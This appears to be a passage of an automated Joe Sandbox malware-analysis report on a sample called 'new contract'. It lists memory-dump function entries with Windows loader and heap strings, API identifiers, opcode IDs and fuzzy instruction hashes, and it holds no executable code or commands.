                                                                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 016DC1C5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                            • API String ID: 0-2968386058
                                                                                                                                                                            • Opcode ID: 4363f72733ec7c46ab9fb2fda3fd907b64770aaf683e07330fd4e7b8ef366b24
                                                                                                                                                                            • Instruction ID: 6d3ffe50855e7982f0a421f3709fb1f14548a012362b1373f827e851994ca6e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 4363f72733ec7c46ab9fb2fda3fd907b64770aaf683e07330fd4e7b8ef366b24
                                                                                                                                                                            • Instruction Fuzzy Hash: EA417172E0021DEBDB11DAD9CC91BEEBBBDAB14700F14816EE609A7244D7749A44CB94
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                            • API String ID: 0-1373925480
                                                                                                                                                                            • Opcode ID: 3ccf32fdd9159c572cf60fe00be02e6c10d53027490e85e39116fc10fc42f477
                                                                                                                                                                            • Instruction ID: 8dfb85b9ab79ae7535f0fa62dd13560962699763f9128ade4dd5dcb8c4829dbd
                                                                                                                                                                            • Opcode Fuzzy Hash: 3ccf32fdd9159c572cf60fe00be02e6c10d53027490e85e39116fc10fc42f477
                                                                                                                                                                            • Instruction Fuzzy Hash: EF412632A006588BEB26DBD9CD84BEDBBB9FF55340F14046DD902EB382DB359981CB51
                                                                                                                                                                            Strings
                                                                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 016A4888
                                                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 016A4899
                                                                                                                                                                            • LdrpCheckRedirection, xrefs: 016A488F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                            • API String ID: 0-3154609507
                                                                                                                                                                            • Opcode ID: f78fd2a08833c62fc106fbfc2bc7147049202d60c167c7a0e1b8c2a8b48de1ae
                                                                                                                                                                            • Instruction ID: 3e567b938d98e34fa9a4fdf1b980047cc4c8aa15cb968f166791b9e98da8c6b5
                                                                                                                                                                            • Opcode Fuzzy Hash: f78fd2a08833c62fc106fbfc2bc7147049202d60c167c7a0e1b8c2a8b48de1ae
                                                                                                                                                                            • Instruction Fuzzy Hash: AD41C332A046919FCB21CE5CEC40A267BE9FF49A50B4A056DED4997351DBB0EC01CF91
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-2558761708
                                                                                                                                                                            • Opcode ID: 90e71fa0d1c91a174136b69c75a7bd9c01da67c8a0efb7f5439b720cc48a420b
                                                                                                                                                                            • Instruction ID: 7f915320a8c34357439fbab741a0bf1ae657cb7a125ff64346cdf7c8711227ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 90e71fa0d1c91a174136b69c75a7bd9c01da67c8a0efb7f5439b720cc48a420b
                                                                                                                                                                            • Instruction Fuzzy Hash: A311CD353561029FDB29EA1CCC41B66B3A6AF81716F18826DF4078B255DB30D846C755
Strings
• LdrpInitializationFailure, xrefs: 016A20FA
• minkernel\ntdll\ldrinit.c, xrefs: 016A2104
• Process initialization failed with status 0x%08lx, xrefs: 016A20F3
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
• API String ID: 0-2986994758
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: #%u
• API String ID: 48624451-232158463
Strings
• LdrResSearchResource Enter, xrefs: 0162AA13
• LdrResSearchResource Exit, xrefs: 0162AA25
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
• API String ID: 0-4066393604
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: `$`
• API String ID: 0-197956300
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Legacy$UEFI
• API String ID: 2994545307-634100481
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: @$MUI
• API String ID: 0-17815947
Strings
• kLsE, xrefs: 01620540
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0162063D
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
Strings
• RtlpResUltimateFallbackInfo Enter, xrefs: 0162A2FB
• RtlpResUltimateFallbackInfo Exit, xrefs: 0162A309
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-2876891731
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Cleanup Group$Threadpool!
• API String ID: 2994545307-4008356553
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: MUI
• API String ID: 0-1339004836
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
                                                                                                                                                                            • Opcode ID: 64a3ecccb63cab752f81a5f6c9c54af23b41d697e8b5c5ec3ba4e64810cb4836
                                                                                                                                                                            • Instruction ID: ba69b71503f592f0185f437dbabc6a211e8203dffeb8b064576029a7b5222dfe
                                                                                                                                                                            • Opcode Fuzzy Hash: 64a3ecccb63cab752f81a5f6c9c54af23b41d697e8b5c5ec3ba4e64810cb4836
                                                                                                                                                                            • Instruction Fuzzy Hash: D2918571900229AFEB21DF95CD85FAEBBB9EF54750F544059F600AB290D774AD00CFA4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                            • Opcode ID: 1f2a696e4a98bc6565b4cd993c8b0cc7f67bf945ee22fe3af4d87b39050a7c45
                                                                                                                                                                            • Instruction ID: 312457e019b8ea4c13b605ed6c50d1b9caf2222f3cf833f2d1a35cc4a53a8f50
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f2a696e4a98bc6565b4cd993c8b0cc7f67bf945ee22fe3af4d87b39050a7c45
                                                                                                                                                                            • Instruction Fuzzy Hash: 71918032900649AFDB22ABA5DC44FBFBF7AEF95B50F10001DF505A7250DB79A901CB94
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: GlobalTags
                                                                                                                                                                            • API String ID: 0-1106856819
                                                                                                                                                                            • Opcode ID: 9dc59f2b5f5ebcd3edafca3b2d982442a16fbf303d1a85de9825ce6375e97a67
                                                                                                                                                                            • Instruction ID: 02266399b0c34ac0088afa6a14134d920c727ef52aab92bb37663ed34b9f140c
                                                                                                                                                                            • Opcode Fuzzy Hash: 9dc59f2b5f5ebcd3edafca3b2d982442a16fbf303d1a85de9825ce6375e97a67
                                                                                                                                                                            • Instruction Fuzzy Hash: 34716175E0031A9FDF28CF9CD990AADBBB6BF48710F14812EE505AB341E7709941CB64
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .mui
                                                                                                                                                                            • API String ID: 0-1199573805
                                                                                                                                                                            • Opcode ID: 6d6657af45f99a44a9a8b387dd4c9c13fb0e2026c0417506d96a333f2c5b40f3
                                                                                                                                                                            • Instruction ID: 6224b71b2a821c7e6d393af06109bbf9cece318540708d2ea8c32db5675947f0
                                                                                                                                                                            • Opcode Fuzzy Hash: 6d6657af45f99a44a9a8b387dd4c9c13fb0e2026c0417506d96a333f2c5b40f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 66515B72D0062ADBDB10DF9DDC50ABEBBB5EF14A50F05416EEA12BB344DB349901CBA4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: EXT-
                                                                                                                                                                            • API String ID: 0-1948896318
                                                                                                                                                                            • Opcode ID: d4eefd381070602f294134dd0c29ee400c70e5173490fc17f85a7df75f2d34fc
                                                                                                                                                                            • Instruction ID: 2e7ae32af848a9b62020256354ac432c82c6660e512af330b5a8d728bb057231
                                                                                                                                                                            • Opcode Fuzzy Hash: d4eefd381070602f294134dd0c29ee400c70e5173490fc17f85a7df75f2d34fc
                                                                                                                                                                            • Instruction Fuzzy Hash: BE4190725083169BD721DA79CC40BABB7E9AFC8714F04092DFA84D7280E775D904C7A6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: BinaryHash
                                                                                                                                                                            • API String ID: 0-2202222882
                                                                                                                                                                            • Opcode ID: e407e4159fb1762b55d1f7f53b0de62bbe5015b6ad410d8764196e22344c8f27
                                                                                                                                                                            • Instruction ID: 07d74ccdc928cb216182d93a4fa40bb62033c7e22d1abca4410d4d496d7c992c
                                                                                                                                                                            • Opcode Fuzzy Hash: e407e4159fb1762b55d1f7f53b0de62bbe5015b6ad410d8764196e22344c8f27
                                                                                                                                                                            • Instruction Fuzzy Hash: DB4152B1D0012DABDF21DA50CD84FDEBB7DAB45714F0145E9EA08AB140DB709E89CFA8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: #
                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                            • Opcode ID: bf7c77692031e65d922e777b54f7bd12bc3fd1f5b1e8c2e5445e56f4e7c91536
                                                                                                                                                                            • Instruction ID: eca21c49a26bf361552eb2617068c7da79c96cac7ef37292f768cae4735a0d20
                                                                                                                                                                            • Opcode Fuzzy Hash: bf7c77692031e65d922e777b54f7bd12bc3fd1f5b1e8c2e5445e56f4e7c91536
                                                                                                                                                                            • Instruction Fuzzy Hash: 4A311431A007199BEB22DB69CC90BEEBBB9DF55704F144068EA41AB382CB75DC85CB54
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: BinaryName
                                                                                                                                                                            • API String ID: 0-215506332
                                                                                                                                                                            • Opcode ID: 20955cefed4d9306394fc622b4a76d78fc378eae32909686b305f00f88b83924
                                                                                                                                                                            • Instruction ID: efe0c25bb890e6875b593147629f5c08cd16bf63db4b7acbb6d717aba6bd40a9
                                                                                                                                                                            • Opcode Fuzzy Hash: 20955cefed4d9306394fc622b4a76d78fc378eae32909686b305f00f88b83924
                                                                                                                                                                            • Instruction Fuzzy Hash: F931E13690051AAFEF16DA59CC55E7FBB78EB80760F014169E905A7290D7309E05DBE0
                                                                                                                                                                            Strings
                                                                                                                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 016A895E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                            • API String ID: 0-702105204
                                                                                                                                                                            • Opcode ID: b0aa048bc6cab2fc0e2a7496c4025cb998cb5b9d6f171f36e766e5116bcce01a
                                                                                                                                                                            • Instruction ID: bf0888b5b4b0d8bb59fdbba4ac12d86207a0d109242233a501fc3cb8ceca0e98
                                                                                                                                                                            • Opcode Fuzzy Hash: b0aa048bc6cab2fc0e2a7496c4025cb998cb5b9d6f171f36e766e5116bcce01a
                                                                                                                                                                            • Instruction Fuzzy Hash: 900176B22042019FE7396B1DCC84A9ABF6AEFC6665B84002CF24103655CB20AC82CF96
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c0bf3aa31ad41576bed732cc09d32c002a906075c4cc6874537eeee8d356b196
                                                                                                                                                                            • Instruction ID: edbe0fbeb6a1504840189c320f0cc8658dddd1217e21783138a9ea6b273326da
                                                                                                                                                                            • Opcode Fuzzy Hash: c0bf3aa31ad41576bed732cc09d32c002a906075c4cc6874537eeee8d356b196
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E42AE756093418BD725CF68CCA0A7BBBE6EB88B00F49492EFE8697350D770D845CB52
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3e230e6a4ad771a089998457e767981002ab67c1ce26dec07c077687d7f760b7
                                                                                                                                                                            • Instruction ID: 0fae13eb55e86683a6904f4e923e307642cd5b97e913fecd4e2ae17f97343bce
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e230e6a4ad771a089998457e767981002ab67c1ce26dec07c077687d7f760b7
• Instruction Fuzzy Hash: 79423D75A002198FEB25CF69CC81BEDBBFABF48300F158199E949AB342D7349985CF50
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 028dfb44d9ef7ba0113e9285e8574d53ab4dfcf13e615b49f7fa8bfa6ec0b8a6
• Instruction ID: 51bed3936a298fddcbc158c6a1d9f0b3a81aa481e0065a2b30b09eacdec2d699
• Opcode Fuzzy Hash: 028dfb44d9ef7ba0113e9285e8574d53ab4dfcf13e615b49f7fa8bfa6ec0b8a6
• Instruction Fuzzy Hash: 7E32CDB0A007558BEB25EF69CC547BEBBF2BF84704F24821DD54A9B385D735A842CB60
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b8dab14bb56f4e89d863e8368984b4d9e5fe6b1fb34fb415951b3973d769b5b
• Instruction ID: 4cdaece25a467ce2d5fbb26de3531066580164eb8b3005942edfc139a0aadc8a
• Opcode Fuzzy Hash: 1b8dab14bb56f4e89d863e8368984b4d9e5fe6b1fb34fb415951b3973d769b5b
• Instruction Fuzzy Hash: BF22BD746046698BEB25CFA9C894372BBF1EF44B00F08C55EE9868B386F335D452DB60
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 465ea72dca7dc30df45932b5e8438639f22abf4d01696cf604a71f9169cd2664
• Instruction ID: 6602ce2abc5f35f0198ec553c997d315504bc7d816c6c46a7eb3863ae9317387
• Opcode Fuzzy Hash: 465ea72dca7dc30df45932b5e8438639f22abf4d01696cf604a71f9169cd2664
• Instruction Fuzzy Hash: 1032BE71A05615CFDB25DF68C880BAABBF2FF48310F148669E956AB391D730E842CF50
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
• Instruction ID: 7a2bd0764b520999af89febe64797489f0b22b2ab2f5cdb25086f6f1cdd2ad5e
• Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
• Instruction Fuzzy Hash: 43F17171E0021A9BDF15DF99CD81BAEBBF6BF48710F098169E945AB340EB34D841CB64
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: be38975e91db932a6e57a268de6d52efd2513a70bd7a18a686aaa14ab59dbd1c
• Instruction ID: 41de8e92c7b53b76a13f5e726961d27be0ab9567a3bb5787352c5a38e970e319
• Opcode Fuzzy Hash: be38975e91db932a6e57a268de6d52efd2513a70bd7a18a686aaa14ab59dbd1c
• Instruction Fuzzy Hash: 23D1E271E0060A8BDF15CF69CC81AFEB7FEAF88304F18816AD955A7241D735E946CB60
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c6a2e42a72aef59e7dc7be7d1e14dd29d011ab7b164e1e409c28b5cfe8ffd777
• Instruction ID: 949a4827902bf7243a089df4156e1d9eeb80f49ff3974d5fb502476401ef8365
• Opcode Fuzzy Hash: c6a2e42a72aef59e7dc7be7d1e14dd29d011ab7b164e1e409c28b5cfe8ffd777
• Instruction Fuzzy Hash: 64E1AE71608752CFC715CF28C890A6ABBE1FF89314F058A6DE99987351DB31E906CF92
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d385bca1dd8cee3a4c591bab7e2a8ec4d4cebbf84df0b32b1285537da716c6ee
• Instruction ID: 8ac2d6902ab0e4b99afc7170718bdb887c37aeba6715dc57a3dc96e4ac37ff33
• Opcode Fuzzy Hash: d385bca1dd8cee3a4c591bab7e2a8ec4d4cebbf84df0b32b1285537da716c6ee
• Instruction Fuzzy Hash: 87D10371A006169BDB14CF68CC90EBEB7BAFF54314F09462DEA16DB284EB34E951CB50
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
• Instruction ID: 74e5f5b10202c01bb28de6f3902da432b14ceeea6990281fd027e2219fe190e2
• Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
• Instruction Fuzzy Hash: B8B17174A006059FEB24DB99CD40AABBBBEFF84305F90846DAA4297790DB34ED45CF50
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
• Instruction ID: 79cc52e7418bca73922415beb8a20d5cbe626597a79e8778d76640210282b82c
• Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
• Instruction Fuzzy Hash: 7BB10671604646AFDB26DB68CD50BBEBBF6AFC8310F140299E552D7381DB30E946CB90
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d981faba4b0adfbc09a0f927a7bb069352ba4859d54b10d005f721991b1db786
• Instruction ID: 2c9d0751dcbebfbdf1698a6989ed02ec414120ad954f99adf177eb0ed5bb706b
• Opcode Fuzzy Hash: d981faba4b0adfbc09a0f927a7bb069352ba4859d54b10d005f721991b1db786
• Instruction Fuzzy Hash: C6C156702083418FE764DF18C894BAAB7E9BF88304F44496DE98997391D7B4E909CF92
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 52b445a8986c62285e94a659874b552802653b7fe699586cc9b4a18fc70f3297
• Instruction ID: 41041f693ada8f7b7c3220abe833344283f7ac8e5340a23f08dcae7b972448bc
• Opcode Fuzzy Hash: 52b445a8986c62285e94a659874b552802653b7fe699586cc9b4a18fc70f3297
• Instruction Fuzzy Hash: 67B18270A402668BDB64DF58CC90BADB7B6EF44700F0885E9D50AE7385EB30DD86CB24
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b43d71b040088946ef3a98ede1e414e3e4183981b1c9661edf4d0b848281253b
• Instruction ID: 3527e5b777ae00019dc329ba41c29a52499991282711a8597c1887601c7144f9
• Opcode Fuzzy Hash: b43d71b040088946ef3a98ede1e414e3e4183981b1c9661edf4d0b848281253b
• Instruction Fuzzy Hash: 46A11631E006259FEB21EB5CCC48BAEBBB5BF01724F054295EA00AB391D7789D41CBD1
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2628868fae2405f36530e2200a6479bf5c245dfa41f9596bc09cec8cfafa18e6
• Instruction ID: 3ae864747dc35d5eb5d32098abe2c25de7b8d1120191a6674cb34fffe4964801
• Opcode Fuzzy Hash: 2628868fae2405f36530e2200a6479bf5c245dfa41f9596bc09cec8cfafa18e6
